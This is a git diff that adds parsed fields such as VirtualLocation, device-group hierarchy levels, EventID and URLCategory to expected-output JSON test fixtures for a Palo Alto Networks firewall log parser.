--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
@@ -52,7 +52,8 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
index 4863396f8..add589697 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
@@ -52,7 +52,8 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
index 09505692f..4fd7b8802 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
@@ -42,6 +42,7 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSQuarantineReason": "Malicious Traffic",
       "authentication": {
         "method": "RADIUS"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 0c72fdb63..65f2b6940 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
@@ -34,7 +34,9 @@
       "serial_number": "ABCDEFG"
     },
     "paloalto": {
+      "EventID": "gw-auth",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "login"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index 2f8cb93ae..e4b1d5fab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
@@ -34,7 +34,9 @@
       "serial_number": "DFN3535D"
     },
     "paloalto": {
+      "EventID": "gateway-config-release",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "configuration"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 966ea0b88..6a0a99b82 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
@@ -40,6 +40,9 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index 6e8e88e79..e4e153224 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "start"
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 4eef50d9d..9d2db872a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
@@ -39,6 +39,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
     "related": {
       "hosts": [
         "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index a6c93b2c4..d14918dab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
@@ -58,8 +58,14 @@
       "serial_number": "000011111112222"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "982",
+      "DGHierarchyLevel2": "117",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index 6fd2dbfa0..e8c257c69 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
@@ -63,8 +63,15 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
+      "ContentType": "text/plain",
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "525",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index ff9edc877..717e963a0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
@@ -57,6 +57,10 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSourceLocation": "US",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index ab8aae097..3e52f494c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
@@ -30,6 +30,11 @@
       "serial_number": "11111114444"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index 49c1758ab..eb10d6148 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801016000"
     },
     "paloalto": {
-      "Threat_ContentType": "start"
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys1234"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index c4c2b4c70..3af5d5428 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 17ae8dd31..5e1cc96a9 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index 72af37535..f4541dcbf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dnsproxy"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index ee2f64323..3142ed671 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
@@ -60,8 +60,14 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "463",
+      "DGHierarchyLevel2": "467",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file"
+      "Threat_ContentType": "file",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index aa4388311..f08a677ef 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
@@ -37,7 +37,9 @@
       "serial_number": "PF000000"
     },
     "paloalto": {
+      "EventID": "gateway-switch-to-ssl",
       "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "tunnel"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
index ed54db08a..bbf2d4e97 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index 6ba2ed95f..aab8fbd6b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -51,7 +51,12 @@
       "serial_number": "012001002253"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "24",
+      "DGHierarchyLevel2": "315",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
         "name": "LDAP: User Login Brute Force Attempt"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index f5f961342..610ab7c24 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
@@ -73,8 +73,14 @@
       "serial_number": "007954000XXXXXX"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "999",
+      "DGHierarchyLevel2": "1111",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file"
+      "Threat_ContentType": "file",
+      "URLCategory": "business-and-economy",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 501fb4be5..25db7ff0a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
@@ -38,7 +38,12 @@
       "version": "0.0.-1"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "556",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "globalprotect",
+      "VirtualSystemID": "1",
       "connection": {
         "stage": "logout"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index 80edd7cf5..c3d742b70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
@@ -62,8 +62,13 @@
       "serial_number": "007954000370000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "category": "brute-force",
         "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index 6a5a4358f..b4a75c57c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
@@ -64,8 +64,14 @@
       "serial_number": "00795400037XXXX"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index 1ad423127..a470b3176 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "ntpd"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index ed9754708..af31efa35 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
@@ -36,6 +36,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "port"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index 76aeaa4ce..c9ebd467e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
@@ -36,6 +36,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index c773195d0..2d21571e0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
@@ -30,6 +30,11 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "test-event",
       "Threat_ContentType": "vpn"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 70c358caf..8a299b691 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
@@ -34,6 +34,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index b481b6c39..4b7dc612f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 989c8393e..7901b05ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index a92e1d91b..30a9a9970 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index c546509c6..f74ff5a47 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 452b9d6bb..8c122fc65 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 4b2a51b0f..524aef010 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index 36807c11d..f305c2d3e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index a83bce94f..63f3bd258 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index 548954584..a00e82987 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index cd41f06d0..9cb10263a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2130588d1..2aa5ce29e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index db55cc61a..48dc1f1bd 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -47,7 +47,12 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "9999"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index 196fc9c0c..e45d01607 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -57,7 +57,12 @@
       "serial_number": "012345678910"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "320",
+      "DGHierarchyLevel2": "90",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
         "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index bc3ccb698..d2e4e4775 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
@@ -30,6 +30,11 @@
       "serial_number": "026701002348"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "general",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index cc477a27e..c0f834538 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
@@ -59,7 +59,13 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index 72bc384fb..cfa92faf3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
@@ -59,7 +59,13 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 4657c725b..2f58900ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
